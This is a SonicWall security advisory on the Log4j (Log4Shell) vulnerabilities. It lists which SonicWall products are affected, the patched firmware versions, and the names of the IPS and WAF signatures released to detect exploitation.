Security Notice: Apache Log4j Remote Code Execution (RCE) Log4shell Vulnerability (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)

First Published:12/14/2021 Last Updated:12/24/2021

NOTICE: SonicWall continues to assess the impact Log4j vulnerabilities have on its products and infrastructure, as utilization of Log4j does not immediately suggest exploitation is possible. Questions related to SonicWall infrastructure should be sent info@sonicwall.com.


The Apache Log4j project disclosed CVE-2021-44228, which is a critical (CVSS 10.0) remote code execution (RCE) vulnerability affecting Apache Log4j2<= 2.14.1. A security patch (Log4j 2.15.0) was released on December 10, 2021, and subsequent Log4j 2.16.0 and Log4j 2.17.0 versions to correct additional vulnerabilities (CVE-2021-45046, CVE-2021-45105).

  • For the latest information regarding SonicWall products and Apache Log4j 2.x, please see PSIRT Advisory ID SNWLID-2021-0032.
  • PSIRT is also tracking vulnerability CVE-2021-4104 related to Log4j 1.x and its impact on SonicWall products. Please reference PSIRT Advisory SNWLID-2021-0033 for updates regarding CVE-2021-4104 going forward.

The SonicWall Product Security Incident and Response Team (PSIRT) continues to review the impact this vulnerability has to SonicWall products. If your organization is using an affected product and end-user action is required, SonicWall will reach out to you directly with guidance.

SonicWall Product
(Appliance/Cloud/Virtual/On-Prem)
StatusDescription
Email Security (ES) &
Hosted Email Security (HES)
ImpactedEmail Security (ES) 10.0.12 and earlier versions are impacted by Log4j vulnerabilities tracked via CVE-2021-44228 (ES 10.0.11 and earlier), CVE-2021-45046 and CVE-2021-45105.

SonicWall has released SonicWall Email Security firmware 10.0.13 to include the updated Log4j2 2.17.0 that patches the above vulnerabilities. Hosted Email Security (HES) was patched automatically.

IMPORTANT: All SonicWall customers using Email Security (On-Prem) devices should immediately log in to MySonicWall and upgrade to Email Security firmware 10.0.13, even if they previously upgraded to 10.0.12.

For upgrade guidance, please review the KB article, "How do I upgrade firmware on an Email Security appliance?"
Network Security Manager
(SaaS, On-Prem)
ImpactedSonicWall PSIRT review has determined NSM does use a vulnerable Log4j version. SonicWall has performed a comprehensive analysis of NSM that resulted in no observable attack vectors for the Log4j2 suite of vulnerabilities.

However, to remove known or potential risk from customer environments, SonicWall has published NSM (On-Prem) firmware 2.3.2-R12-H2 to include Log4j 2.17.0, which addresses CVE-2021-45105 and CVE-2021-42550. As a precaution, NSM 2.3.2-R12-H2 also includes an upgrade to Logback 1.2.9 to address CVE-2021-42550.

NSM (SaaS) was automatically patched to the latest firmware.

IMPORTANT: All SonicWall customers using NSM (On-Prem) devices should immediately log in to MySonicWall and upgrade to 2.3.2-R12-H2, even if they previously upgraded to 2.3.2-R12-H1.

For upgrade guidance, please review the KB article, "How do I upgrade on-prem Network Security Manager firmware?"
Web Application Firewall (WAF)Partially ImpactedAdditional review has found that WAF 3.x uses Log4j, but only when the legacy ‘Cloud Management’ feature is enabled. SonicWall recommends customers disable 'Cloud Management' if enabled. This change will not impact functionality. This feature is disabled by default. WAF 2.x and earlier versions do not use Log4j and are not impacted. Please follow the guidance in the dedicated KB article for changing this setting.
Gen5 Firewalls (EOS)

  • TZ100/W, TZ200/W, TZ210/W
  • NSA 220/W
  • NSA 250M/250M-W
  • NSA 2400/MX/3500/4500/5500
  • NSA E5500/6500/6500/8500/8510
Not ImpactedLog4j2 not used in the appliance.
Gen6 Firewalls

  • TZ300/W, TZ350/W, TZ400/W, TZ500/W, TZ600
  • NSa 2600/2650/3600/3650/4600 /4650/5600/5650/6600/6650
  • SuperMassive 9200/9400/9600/9800
  • NSa 9250/9450/9650
  • NSsp 12400/12800
  • NSv 10/25/50/100/200/400/800/1600 (ESX, KVM, HYPER-V, AWS, Azure)
Not ImpactedLog4j2 not used in the appliance.
Gen7 Firewalls

  • TZ270/W, TZ370/W, TZ470/W, TZ570/W, TZ670
  • NSa 2700/3700/4700/5700/6700
  • NSsp 10700/11700/13700/15700
  • NSv 270/470/870 (ESX, KVM, HYPER-V, AWS, Azure)
Not ImpactedLog4j2 not used in the appliance.
SonicWall Switch

  • SWS 12-8/12-8POE
  • SWS 12-10FPOE
  • SWS 14-24/14-24FPOE
  • SWS 14-48/14-48FPO
Not ImpactedLog4j2 not used.
SMA 100

  • SMA 200/210/400/410
  • SMA 500v (ESX, KVM, Hyper-V, AWS, Azure)
Not ImpactedLog4j2 not used.
SMA 1000

  • SMA 6200/7200/6210/7210
  • SMA 8200v (ESX, KVM, Hyper-V, AWS, Azure
Not ImpactedVersion 12.x not using vulnerable Log4j version.
MySonicWall (MSW)Not ImpactedLog4j2 not used.
AnalyzerNot ImpactedVersion Analyzer 1.x is not using the vulnerable Log4j version.
GMSNot ImpactedGMS version 9.x and 8.x are not using the vulnerable Log4j version.
Capture Client & Capture Client PortalNot ImpactedLog4j2 not used.
CASNot ImpactedLog4j2 not used.
Access PointsNot ImpactedLog4j2 not used.
Wireless Network Manager (WNM)Not ImpactedLog4j2 not used.
Capture Security ApplianceNot ImpactedLog4j2 not used.
WXA

  • WXA 2000/4000
  • Virtual: WXA 5000
  • Software: WXA 500, WXA 6000
Not ImpactedWXA is not using the vulnerable Log4j version.
CSCMANot ImpactedCSCMA is not using the vulnerable Log4j version.
EPRSNot ImpactedEPRS 1.x and 2.x are not using the vulnerable Log4j version.
Cloud EdgeNot ImpactedCloud Edge is not using the vulnerable Log4j version.
AnalyticsNot ImpactedAnalytics is not using the vulnerable Log4j version.


While there are no signs of active exploitation on SonicWall products, SonicWall urges organizations using Apache Log4j to patch immediately. The industry is observing coinminers, remote access trojans (RAT) and Cobalt Strike payloads being actively deployed against vulnerable servers.

SonicWall threat research teams have released the following the IPS and WAF signatures to help detect attacks exploiting these vulnerabilities.

  • 2307 Apache Log4j2 JNDI Log Messages Remote Code Execution
  • 18198 Apache Log4j2 JNDI Log Messages Remote Code Execution LDAPS
  • 18199 Apache Log4j2 JNDI Log Messages Remote Code Execution NIS
  • 18200 Apache Log4j2 JNDI Log Messages Remote Code Execution NDS
  • 18201 Apache Log4j2 JNDI Log Messages Remote Code Execution COBRA
  • 18202 Apache Log4j2 JNDI Log Messages Remote Code Execution RMI
  • 18203 Apache Log4j2 JNDI Log Messages Remote Code Execution IIOP
  • 18204 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS 2
  • 2311 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTP
  • 2315 Apache Log4j2 JNDI Log Messages Remote Code Execution DNS
  • 2328 Apache Log4j2 JNDI Log Messages Remote Code Execution HTTPS
  • 1116 Apache Log4j2 JNDI Log Messages Remote Code Execution

Resources:

Trace:6e772ae5ec3bd53085d61ae1ba343a92-93